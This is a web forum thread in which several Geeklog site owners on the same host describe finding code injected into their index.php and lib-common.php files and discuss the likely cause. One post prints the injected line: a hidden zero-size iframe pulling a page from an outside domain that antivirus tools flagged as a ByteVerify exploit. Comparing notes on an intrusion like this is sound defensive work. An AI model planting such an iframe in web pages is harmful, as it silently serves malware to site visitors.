Welcome to Geeklog, Anonymous Saturday, November 30 2024 @ 12:28 am EST

Geeklog Forums

unusual iframe on my site

Page navigation


Status: offline

rav

Forum User
Chatty
Registered: 01/14/03
Posts: 37
Installed it myself. I have 4 templates installed, but I haven't touched any of them in quite sometime. The site has been running smoothly for almost 2 years now. It was the main index.php file that was modified, not any of the layout files.

I'll go back through and look at the FTP logs.
 Quote

Status: offline

keystone

Forum User
Chatty
Registered: 09/21/02
Posts: 50
I'm using PSEK and my site has been hacked twice. The first time the iframe code was inserted in the index.php and index.html.

This time the iframe code was inserted in Lib-common.php.

I've changed my passwords now a couple of times.
 Quote

Status: offline

rav

Forum User
Chatty
Registered: 01/14/03
Posts: 37
Yeah, I just had the EXACT same thing happen to me. First time was in index.php - and this last firday, found it in the lib-common.php - I am also hosted at psek.com

Think I'm gonna start looking for a new host. They are getting expensive and the quality has gone down since the sale of psek and I've been hacked TWICE now in the short time they have taken over.

When I asked their support, the simply blamed in on geeklog. I was on an older version (1.3.Cool so I upgrade and now I'm on 1.3.11.

What version of GL were you running when they hacked you?
 Quote

Status: offline

usarfans

Forum User
Junior
Registered: 08/10/03
Posts: 34
I'm starting to believe it's an inside job from some person at PSek.com

My lib-commpn.php file was hacked on 4/29.05 @11:27 am. I bet if you check, your's was done at the same time.

This time this code was added to the file -->

Text Formatted Code
<iframe src=http://vipcontact.net/adbanner.php frameborder="0" width="0" height="0" scrolling="no"></iframe>
 


It caused Symantec, Trend Micro, and McAfee to alert on it as being a "JAVA_BYTEVER.A" or "Exploit-ByteVerify" Virus.

These recent problems HAVE to be form someone with specific knowledge of Geeklog and the ability to modify system files.

Anybody recommend another ISP????

Lou

 Quote

Brandon Mizrahie

Anonymous
The problem that you are describing is the result of a client with an insecure script which allowed a remote user to injext a malicious code which in turn affected a few pSek accounts using this Geeklog script. Only accounts using Geeklog were affected so we're still trying to track down the cause.

 Quote

Status: offline

keystone

Forum User
Chatty
Registered: 09/21/02
Posts: 50
Quote by rav: Yeah, I just had the EXACT same thing happen to me. First time was in index.php - and this last firday, found it in the lib-common.php - I am also hosted at psek.com

Think I'm gonna start looking for a new host. They are getting expensive and the quality has gone down since the sale of psek and I've been hacked TWICE now in the short time they have taken over.

When I asked their support, the simply blamed in on geeklog. I was on an older version (1.3.Cool so I upgrade and now I'm on 1.3.11.

What version of GL were you running when they hacked you?

I'm running an older version and will upgrade. Did it happen after you upgraded to 1.3.11?
 Quote

Status: offline

keystone

Forum User
Chatty
Registered: 09/21/02
Posts: 50
Also, my geeklog site is password protected at the web server level. So a user has to authenticate to the web server prior to getting access to geeklog.

In my case, the hacker would have had to have cracked that password as well in order to even run a malicious GL script.

Seems to me that there may be an issue at the PSEK hosting level...
 Quote

Status: offline

usarfans

Forum User
Junior
Registered: 08/10/03
Posts: 34
Quote by keystone: I'm running an older version and will upgrade. Did it happen after you upgraded to 1.3.11?


The first hack occured when I was still running an older verion of GL. The hack from Friday was AFTER I had upgraded to 1.3.11.

Lou
 Quote

Status: offline

rav

Forum User
Chatty
Registered: 01/14/03
Posts: 37
no, I was running 1.3.8 both times I got hacked. I'm at 1.3.11 now.
 Quote

Status: offline

frisco3

Forum User
Junior
Registered: 02/06/04
Posts: 23
Location:Burlington Vermont
Hi all! I have been having the same problem on the psek server called "knicks" I'm curious if everyone else is on the same server. You can see your server name by going to www.yourwebsite.com/cpanel and looking at the section in the bottom right (Generel Server Information).

I had the malicious code for vipcontact.net in my lib-common file. I removed the malicious code and everything seems to be fine now.

Psek has been pretty good about this issue with me. They admit they are still looking into the cause and say it's because one of their clients uploaded malicious code that then infected the server somehow, but that they've isolated the outbreak. They have given no indication that the file was loaded intentionally by the client or if there was a third party involved.

Note that Brandon Mizrahie above is from psek and I alerted him of this thread earlier today. His quote above is a reply to a support ticket I sent to him.
 Quote

Status: offline

usarfans

Forum User
Junior
Registered: 08/10/03
Posts: 34
Here is the response I got last night from PSek as the closed out the trouble ticket. Make any sense you any of you ????


the problem is completely isolated and solved. but we strongly recomend to all our customers to download and install official MicroSoft antispyware tool and do the local box full scan to get rid of any sort of spyware:

http://www.microsoft.com/downloads/details.aspx?FamilyID=321cd7a2-6a57-4c57-a8bd-dbf62eda9671&displaylang=en


Lou
 Quote

Status: offline

rav

Forum User
Chatty
Registered: 01/14/03
Posts: 37
They are just warning users to have some sort of anti-spyware / anti-virus software installed on their systems. I have both of course, or I would have NEVER known that there was a problem in the first place.

Some of my users got infected though and they thought it was MY site that was doing it to them.

Support kept telling me that it was the version of GL that I was running. So I upgraded it (which needed to be done anyway Wink ). The fact that you've been affected even after upgrading to 1.3.11 is concerning.

If it happens again, I'm switching hosts.
 Quote

Page navigation

All times are EST. The time is now 12:28 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content